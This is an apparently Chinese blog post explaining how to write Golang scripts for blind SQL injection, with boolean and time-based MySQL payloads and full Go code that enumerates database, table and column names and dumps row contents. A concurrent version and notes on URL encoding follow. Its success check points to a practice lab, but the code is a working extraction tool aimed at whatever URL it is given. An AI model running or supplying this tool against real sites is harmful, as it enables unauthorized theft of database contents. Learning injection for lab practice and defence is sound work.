Golang 盲注脚本

payload部分

其中脚本最重要的环节就是payload部分了,需要如何去闭合,如何构造SQL语句来达到判断的效果。(还有如何绕过waf等等。。。)

bool盲注

下面是最基础的布尔型盲注的payload

' and length(database()=n)--+

' and (ascii(substr(database(),1))=110 --+

' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=2 --+

' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=128) --+

' and length((select column_name from information_schema.columns where table_name='emails' limit 0,1))=2--+

' and length((select id from emails limit 0,1)>1)--+

时间盲注

下面是时间盲注的payload

' and sleep(3)--+

' and if(length(database())=8,sleep(3),1)--+

' and if( payload   ,sleep(3),1)--+

' and if((ascii(substr(database(),1))=115),sleep(3),1)--

脚本思路

脚本思路也比较简单(只针对GET型注入,POST型同理)

布尔型

对于布尔型盲注,配合构造好的payload发起GET请求,检查响应体中是否有我们的判断依据。先判断出库名、字段名、表名对应的长度,将其作为参数构造循环,搭配limit来逐位判断。

package main

import (

	"fmt"

	"io/ioutil"

	"log"

	"net/http"

	"net/url"

	"strings"

)

//发送get请求

func getRequest(payload string)  bool{

	payload = url.QueryEscape(payload)

	resp, err1 := http.Get(urlL + payload)

	if err1 != nil {

		log.Fatalln(err1)

	}

	body, err2:= ioutil.ReadAll(resp.Body)

	if err2 != nil {

		log.Fatalln(err2)

	}

	defer resp.Body.Close()

	if strings.Contains(string(body), "You are in...........") {

		return true

	}

	return false

}

//判断长度的方法

func testLength(payload string) int {

	var result int

	for i := 0; i < 50; i++ {

		payloadDbLength  := fmt.Sprintf("' and length(%s)=%d-- ", payload, i)

		f := getRequest(payloadDbLength)

		if f {

			result = i

			break

		}

	}

	return result

}

//逐位判断的方法

func testName(payload string, length int)  string{

	var result string

	for i := 1; i <= length; i++ {

		for j :=32 ; j <= 128; j++ {

			payloadDbName := fmt.Sprintf("' and (ascii(substr(%s,%d))=%d)-- ", payload, i, j)

			f := getRequest(payloadDbName)

			if f {

				result += string(rune(j))

				fmt.Println(result)

			}

		}

	}

	return result

}

//该方法用于指定字段和表名的判断,需要给定参数表名和字段名

func testContext(tableName, columnName string)  {

	ctxList := make([]string,0)

	for i := 0; i < 50; i++  {

		ctxPayload := fmt.Sprintf("(select %s from %s limit %d,1)", columnName, tableName, i)

		ctxLength := testLength(ctxPayload)

		if ctxLength == 0 {

			break

		}

		ctx := testName(ctxPayload,ctxLength)

		ctxList = append(ctxList, ctx)

		fmt.Println(ctx)

	}

	fmt.Println(ctxList)

}

func sqlInjectBaseBool() {

	dbPayload := "database()"

	dbLength = testLength(dbPayload)

	fmt.Println(dbLength)

	dbName = testName(dbPayload,dbLength)

	test = ""

	fmt.Println(dbName)

	for i := 0; i < 20; i++ {

		tablePayload := fmt.Sprintf("(select table_name from information_schema.tables where table_schema=database() limit %d,1)", i)

		tableLength := testLength(tablePayload)

		if tableLength == 0 {

			break

		}

		tableName := testName(tablePayload, tableLength)

		test = ""

		tableList = append(tableList, tableName)

		fmt.Println(tableName)

	}

	fmt.Println(tableList)

	//tableList := []string{"emails", "referers", "uagents", "users"}

	for _, tableName := range tableList {

		columnList := make([]string,0)

		fmt.Println(tableName)

		for i := 0; i < 20; i++ {

			columnPayload := fmt.Sprintf("(select column_name from information_schema.columns where table_name='%s' and table_schema=database() limit %d,1)", tableName, i)

			columnLength := testLength(columnPayload)

			if columnLength == 0{

				break

			}

			columnName := testName(columnPayload,columnLength)

			test = ""

			columnList = append(columnList, columnName)

		}

		tableAndColumns[tableName] = columnList

	}

	fmt.Println(tableAndColumns)

}

时间型

同上布尔型,发送GET请求,不过判断的依据位服务器的响应时长是否超过了我们sleep()函数中设定的时间。

package main

import (

	"fmt"

	"log"

	"net/http"

	"net/url"

	"time"

)

//发送get请求。判断响应时长是否大于预定时间

func getRequestBaseTime(payload string)  bool{

	payload = url.QueryEscape(payload)

	//fmt.Println(payload)

	startTime := time.Now()

	resp, err1 := http.Get(urlL + payload)

	if err1 != nil {

		log.Fatalln(err1)

	}

	defer resp.Body.Close()

	endTime := time.Now()

	usedTime := endTime.Sub(startTime)

	if usedTime >= 3 * time.Second {

		return true

	}

	return false

}

//判断长度的方法

func testLengthBaseTime(payload string) int {

	var result int

	for i := 0; i < 50; i++ {

		payloadDbLength  := fmt.Sprintf("' and if(length(%s)=%d,sleep(3),1)-- ", payload, i)

		f := getRequestBaseTime(payloadDbLength)

		if f {

			result = i

			break

		}

	}

	return result

}

//判断表名、库名等的方法

func testNameBaseTime(payload string, length int)  string{

	var result string

	for i := 1; i <= length; i++ {

		for j :=32 ; j <= 128; j++ {

			payloadDbName := fmt.Sprintf("' and if((ascii(substr(%s,%d))=%d),sleep(3),1)-- ", payload, i, j)

			f := getRequestBaseTime(payloadDbName)

			if f {

				result += string(rune(j))

				fmt.Println(result)

			}

		}

	}

	return result

}

func sqlInjectBaseTime() {

	dbPayload := "database()"

	dbLength = testLengthBaseTime(dbPayload)

	fmt.Println(dbLength)

	dbName = testNameBaseTime(dbPayload,dbLength)

	test = ""

	fmt.Println(dbName)

	for i := 0; i < 20; i++ {

		tablePayload := fmt.Sprintf("(select table_name from information_schema.tables where table_schema=database() limit %d,1)", i)

		tableLength := testLength(tablePayload)

		if tableLength == 0 {

			break

		}

		tableName := testNameBaseTime(tablePayload, tableLength)

		test = ""

		tableList = append(tableList, tableName)

		fmt.Println(tableName)

	}

	fmt.Println(tableList)

	//tableList := []string{"emails", "referers", "uagents", "users"}

	for _, tableName := range tableList {

		columnList := make([]string,0)

		fmt.Println(tableName)

		for i := 0; i < 20; i++ {

			columnPayload := fmt.Sprintf("(select column_name from information_schema.columns where table_name='%s' and table_schema=database() limit %d,1)", tableName, i)

			columnLength := testLengthBaseTime(columnPayload)

			if columnLength == 0{

				break

			}

			columnName := testNameBaseTime(columnPayload,columnLength)

			test = ""

			columnList = append(columnList, columnName)

		}

		tableAndColumns[tableName] = columnList

	}

	fmt.Println(tableAndColumns)

}

关于并发

下面代码是对布尔型盲注的并发代码。时间上大概会快一倍。

在逐位进行猜解时,通过循环添加工人(添加线程),对ascii值进行多线程的判断。

逻辑也比较简单,时间盲注也可以使用此逻辑。。

但是仍存在问题没有解决:程序刚开始执行速度很快,但是到后面速度会下降到与不并发一样。。不太理解这里存在的问题。。。

package main

import (

	"fmt"

	"sync"

)

func sqlInject() {

	dbPayload := "database()"

	dbLength = testLength(dbPayload)

	fmt.Println(dbLength)

	dbName = testWorker(dbPayload,dbLength)

	test = ""

	fmt.Println(dbName)

	for i := 0; i < 20; i++ {

		tablePayload := fmt.Sprintf("(select table_name from information_schema.tables where table_schema=database() limit %d,1)", i)

		tableLength := testLength(tablePayload)

		if tableLength == 0 {

			break

		}

		tableName := testWorker(tablePayload, tableLength)

		test = ""

		tableList = append(tableList, tableName)

		fmt.Println(tableName)

	}

	fmt.Println(tableList)

	//tableList := []string{"emails", "referers", "uagents", "users"}

	for _, tableName := range tableList {

		columnList := make([]string,0)

		fmt.Println(tableName)

		for i := 0; i < 20; i++ {

			columnPayload := fmt.Sprintf("(select column_name from information_schema.columns where table_name='%s' and table_schema=database() limit %d,1)", tableName, i)

			columnLength := testLength(columnPayload)

			if columnLength == 0{

				break

			}

			columnName := testWorker(columnPayload,columnLength)

			test = ""

			columnList = append(columnList, columnName)

		}

		tableAndColumns[tableName] = columnList

	}

	fmt.Println(tableAndColumns)

}

//工人函数,从asciiCode这个通道内取出数据来判断。。

func worker(asciiCode chan int, payload string, i int, wg *sync.WaitGroup) {

	for code := range asciiCode {

		payloadDbName := fmt.Sprintf("' and (ascii(substr(%s,%d))=%d)-- ", payload, i, code)

		f := getRequest(payloadDbName)

		if f {

			test += string(rune(code))

			fmt.Println(test)

			//close(asciiCode)

		}

		wg.Done()

	}

}

func testWorker(payload string, length int)  string{

	//var result string

	var wg sync.WaitGroup

	for j := 1; j <= length; j++ {

        //缓冲通道的容量也可以设置的大一些,可以稍微提升性能。

		asciiCode := make(chan int,10)

		for i := 0; i < 10; i++ {

			go worker(asciiCode, payload, j, &wg)

		}

		for i := 32; i <= 128; i++{

			wg.Add(1)

			asciiCode <- i

		}

		wg.Wait()

		close(asciiCode)

	}

	return test

}

踩坑

发起的GET请求中,URL字符串必须先进行编码。

如果直接使用GO的方法发起请求,由于字符串时没有经过编码处理的,特殊符号无法被服务器识别,就会产生400报错。

可以先手工对要发起的请求进行URL编码,也可以使用url.QueryEscape()

当你使用此函数时,会返回一个经过编码的字符串,其中所有的特殊符号都会经过编码。但是通常注入时,在URL中输入的+会被认为是一个空格。所以在payload中需要把+号换成空格。

Golang 盲注脚本的更多相关文章

  1. 利用java编写的盲注脚本

    之前在网上见到一个盲注的题目,正好闲来无事,便用java写了个盲注脚本,并记录下过程中的坑 题目源码: <?php header("Content-Type: text/html;ch ...

  2. WEB安全 ACCESS 注入、盲注脚本

    http://www.xxx.cn/cp.asp?classid=3http://www.xxx.cn/cp.asp?classid=3 and //有拦截关键字http://www.xxx.cn/c ...

  3. 盲注脚本2.基于bool

    盲注脚本2.基于bool #!/usr/bin/env python #encoding:utf-8 #by i3ekr #using # python sqlinject.py -D "数 ...

  4. 动态调试|Maccms SQL 注入分析(附注入盲注脚本)

    0x01 前言 已经有一周没发表文章了,一个朋友叫我研究maccms的代码审计,碰到这个注入的漏洞挺有趣的,就在此写一篇分析文. 0x02 环境 Web: phpstudySystem: Window ...

  5. 【Python】测试布尔型盲注脚本

    sqli-labs第八关:单引号布尔型盲注,手工测出database长度,个人觉得手工比较快 然后使用脚本测database内容,这个脚本就比手工快多了,脚本内容如下: import sys impo ...

  6. 用python写一个自动化盲注脚本

    前言 当我们进行SQL注入攻击时,当发现无法进行union注入或者报错等注入,那么,就需要考虑盲注了,当我们进行盲注时,需要通过页面的反馈(布尔盲注)或者相应时间(时间盲注),来一个字符一个字符的进行 ...

  7. 时间盲注脚本.py

    时间盲注脚本 #!/usr/bin/env python # -*- coding: utf-8 -*- import requests import time payloads = 'abcdefg ...

  8. PHP正则表达式二分法实现mysql盲注脚本

    $sUrl = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'; $sPost = 'inject=Inject&injection='; $sCharset = 'AB ...

  9. 实验吧之【who are you?】(时间盲注)补充

    第二种方法 使用brup进行盲注  也是一个道理 不多贴了 这里提一下  burp怎么判断超时 Options->Connections->Tiimeouts->Normal这一空 ...

随机推荐

  1. zabbix 1.1

    1.zabbix监控平台 2.zabbix的三部分组件:      Zabbix server 是 Zabbix软件的核心组件,agent 向其报告可用性.系统完整性信息和统计信息.server也是存 ...

  2. 第一篇:实时网络日志分析器和交互式查看器--GoAccess安装

    介绍 GoAccess是一个开源的实时网络日志分析器和交互式查看器,可以在* nix 系统或通过浏览器的终端中运行. 它为需要动态可视化服务器报告的系统管理员提供快速且有价值的HTTP统计信息. 特征 ...

  3. pymysql.err.OperationalError: (1054, "Unknown column 'aa' in 'field list'")(已解决)

    错误描述: 今天使用python连接mysql数据库进行数据添加时,出现报错"pymysql.err.OperationalError: (1054, "Unknown colum ...

  4. 【单片机】CH32V103v8t6开发板调试笔记

    一.开发板样式和资源 找官网的商务申请了一块开发板,打算试一下串口打印程序测试,发现网上关于这个板子的相关资料特别少,为方便后来人,就顺便记录一下,板子资源如下图所示. 板子芯片的引脚排布图 二.使用 ...

  5. 通过CSS让图片变的清楚

    image { width: 100%; height: 100%; border-radius: 10upx; //让图片变清楚 image-rendering: -moz-crisp-edges; ...

  6. Istio 中实现客户端源 IP 的保持

    作者 尹烨,腾讯专家工程师, 腾讯云 TCM 产品负责人.在 K8s.Service Mesh 等方面有多年的实践经验. 导语 对于很多后端服务业务,我们都希望得到客户端源 IP.云上的负载均衡器,比 ...

  7. 字符串的操作、 Math类

    字符串的操作 我们先来定义一个字符串,如果来进行过去长度,获取内容. 我们来写一个小测试! public static void main(String[] args) { String aa = & ...

  8. WindowsServer评估版转为正式版并激活

    更新记录 本文迁移自Panda666原博客,原发布时间:2021年5月16日. 一般从官网下载的Windows Server版本都是评估试用版本.这时候想转为正式版本,就需要使用转换激活代码.请参照不 ...

  9. Jmeter(五十四) - 从入门到精通高级篇 - 如何在linux系统下运行jmeter脚本 - 上篇(详解教程)

    1.简介 上一篇宏哥已经介绍了如何在Linux系统中安装Jmeter,想必各位小伙伴都已经在Linux服务器或者虚拟机上已经实践并且都已经成功安装好了,那么今天宏哥就来介绍一下如何在Linux系统下运 ...

  10. go-zero微服务实战系列(四、CRUD热热身)

    上一篇文章我们把整个项目的架子搭建完成,服务在本地也已经能运行起来了,顺利成章的接下来我们就应该开始写业务逻辑代码了,但是单纯的写业务逻辑代码是比较枯燥的,业务逻辑的代码我会不断地补充到 lerbon ...